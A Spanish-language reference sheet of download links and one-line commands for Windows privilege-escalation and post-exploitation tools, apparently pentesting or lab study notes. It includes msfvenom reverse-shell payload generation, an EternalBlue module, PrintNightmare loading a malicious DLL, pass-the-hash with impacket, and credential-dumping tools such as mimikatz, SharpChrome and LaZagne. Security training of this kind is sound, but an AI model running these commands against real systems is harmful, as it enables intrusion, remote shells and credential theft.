REFERENCIAS Y DESCARGAS - Windows Privilege Escalation
Herramientas de Enumeración
WinPEAS
- GitHub: https://github.com/carlospolop/PEASS-ng
- Descargar directo: https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEASx64.exe
- Versión .bat: https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEAS.bat
powershell
wget https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEASx64.exe
iwr -uri "https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEASx64.exe" -OutFile winpeas.exePrivescCheck
- GitHub: https://github.com/itm4n/PrivescCheck
- Descargar directo: https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1
powershell
iwr -uri "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1" -OutFile PrivescCheck.ps1WES-NG (Windows Exploit Suggester - Next Generation)
- GitHub: https://github.com/bitsadmin/wesng
- Instalación:
pip install wesng - En Kali:
python3 -m pip install wesng
bash
git clone https://github.com/bitsadmin/wesng.git
cd wesng
python3 wes.py --update
python3 wes.py sysinfo.txtMetasploit Framework
- Oficial: https://www.metasploit.com/
- GitHub: https://github.com/rapid7/metasploit-framework
- Instalación en Kali: Preinstalado
- Docker:
docker pull metasploitframework/metasploit-framework
bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100Herramientas de Escalación - SeImpersonate
JuicyPotato
- GitHub: https://github.com/ohpe/juicy-potato
- Releases: https://github.com/ohpe/juicy-potato/releases
- Descarga directa: https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
powershell
iwr -uri "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe" -OutFile JuicyPotato.exeSigmaPotato (Moderna, Recomendada)
- GitHub: https://github.com/tylerdotrar/SigmaPotato
- Releases: https://github.com/tylerdotrar/SigmaPotato/releases
- Descarga directa (v1.2.6): https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
powershell
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
iwr -uri "https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe" -OutFile SigmaPotato.exePrintSpoofer
- GitHub: https://github.com/itm4n/PrintSpoofer
- Releases: https://github.com/itm4n/PrintSpoofer/releases
- Descarga directa: https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
powershell
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -OutFile PrintSpoofer.exeRogueWinRM
- GitHub: https://github.com/antonioCoco/RogueWinRM
- Releases: https://github.com/antonioCoco/RogueWinRM/releases
powershell
wget https://github.com/antonioCoco/RogueWinRM/releases/latestHerramientas de Post-Explotación
Mimikatz
- GitHub: https://github.com/gentilkiwi/mimikatz
- Releases: https://github.com/gentilkiwi/mimikatz/releases
- Descarga directa: https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220519/mimikatz_trunk.zip
bash
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220519/mimikatz_trunk.zip
unzip mimikatz_trunk.zip
cd mimikatz/x64
./mimikatz.exeSharpChrome
- GitHub: https://github.com/GhostPack/SharpChrome
- Pre-compilado: https://github.com/GhostPack/SharpChrome/releases
powershell
.\SharpChrome.exe logins /unprotectPowerUp
- GitHub: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
- Raw: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
powershell
iwr -uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1" -OutFile PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecksInvoke-SessionGopher
- GitHub: https://github.com/Arvanaghi/SessionGopher
- Raw: https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
powershell
iwr -uri "https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1" -OutFile SessionGopher.ps1
Invoke-SessionGopher -Target localhostLaZagne
- GitHub: https://github.com/AlessandroZ/LaZagne
- Releases: https://github.com/AlessandroZ/LaZagne/releases
bash
wget https://github.com/AlessandroZ/LaZagne/releases/latestExploits de Kernel
PrintNightmare (CVE-2021-1675)
- GitHub PoC: https://github.com/calebstewart/CVE-2021-1675
- PowerShell: https://github.com/calebstewart/CVE-2021-1675/blob/main/Invoke-Nightmare.ps1
powershell
iwr -uri "https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/Invoke-Nightmare.ps1" -OutFile Invoke-Nightmare.ps1
Invoke-Nightmare -DriverPath C:\malicioso.dllHiveNightmare (CVE-2021-36934)
- PoC: Acceder a
C:\System Volume Information\RegBack\ - Usar
secretsdumpde impacket para extraer hashes
CVE-2023-29360
- GitHub: Buscar en exploit-db
- Exploit-DB: https://www.exploit-db.com/search?q=CVE-2023-29360
bash
searchsploit CVE-2023-29360Herramientas de Transferencia
nc.exe (Netcat para Windows)
powershell
iwr -uri "https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip" -OutFile nc.zipmsfvenom (Generador de Payloads)
- Incluido en: Metasploit Framework
- Instalación en Kali: Preinstalado
- Documentación: https://docs.metasploit.com/
bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o shell.dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o shell.msiImpacket
- GitHub: https://github.com/fortra/impacket
- Pip:
pip install impacket
bash
python3 -m impacket.psexec -hashes LM:NTLM usuario@192.168.1.100
python3 -m impacket.secretsdump -sam sam.hive -system system.hive LOCALHerramientas de Análisis
Accesschk
- Sysinternals: https://download.sysinternals.com/files/AccessChk.zip
- Directo: https://live.sysinternals.com/accesschk64.exe
powershell
iwr -uri "https://live.sysinternals.com/accesschk64.exe" -OutFile accesschk.exe
.\accesschk.exe -qlc servicioProcess Explorer
powershell
iwr -uri "https://live.sysinternals.com/procexp64.exe" -OutFile procexp.exeProcess Hacker
- GitHub: https://github.com/processhacker/processhacker
- Descargar: https://processhacker.sourceforge.io/
powershell
# Descarga manual desde sitio oficialReferencias Oficiales
GTFOBins (para técnicas de escape)
LOLBINS (Living Off The Land Binaries)
Microsoft Docs
- Privileges: https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants
- Services: https://docs.microsoft.com/en-us/windows/win32/services/services
Priv2Admin
- GitHub: https://github.com/gtworek/Priv2Admin
- Exploración de privilegios peligrosos
Instalación Rápida en Kali
bash
# Actualizar
sudo apt update && sudo apt upgrade -y
# Herramientas básicas
sudo apt install -y git wget curl python3 python3-pip
# Python packages
pip3 install impacket pycryptodome
# Clonar repositorios útiles
git clone https://github.com/carlospolop/PEASS-ng.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/gentilkiwi/mimikatz.git
# Descargar herramientas
wget https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEASx64.exe
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1